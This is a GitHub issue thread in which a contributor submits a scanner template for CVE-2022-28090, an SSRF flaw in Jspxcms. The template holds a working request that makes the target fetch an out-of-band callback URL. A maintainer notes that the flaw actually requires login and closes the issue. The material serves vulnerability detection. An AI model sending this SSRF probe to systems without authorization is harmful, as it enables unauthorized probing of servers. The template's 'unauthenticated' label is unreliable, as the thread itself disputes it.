CVE-2022-28090
akincibor opened this issue · comments
akincibor.eth commented
id: CVE-2022-28090
info:
name: Jspxcms < 10.2.0 - Unauthenticated SSRF
author: Akincibor
severity: high
description: Jspxcms v10.2.0 allows attackers to execute a Server-Side Request Forgery (SSRF) via /cmscp/ext/collect/fetch_url.do?url=.
reference:
- https://gitee.com/jspxcms/Jspxcms/issues/I4ZKDR
tags: ssrf,cve,cve2022
requests:
- method: GET
path:
- '{{BaseURL}}/cmscp/ext/collect/fetch_url.do?url=https://{{interactsh-url}}/'
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
Prince Chaddha commented
Hello @akincibor, thank you so much for sharing this template with the community and contributing to this project 🍻
As mentioned in the reference here, this is an authenticated issue.
When not logged in, the access trigger point will jump to the login page
Prince Chaddha commented
Hello @akincibor, thank you so much for sharing this template with the community and contributing to this project 🍻
Since there has been no activity on this issue, I am closing it. However, please feel free to open a new issue for this CVE if you have more details.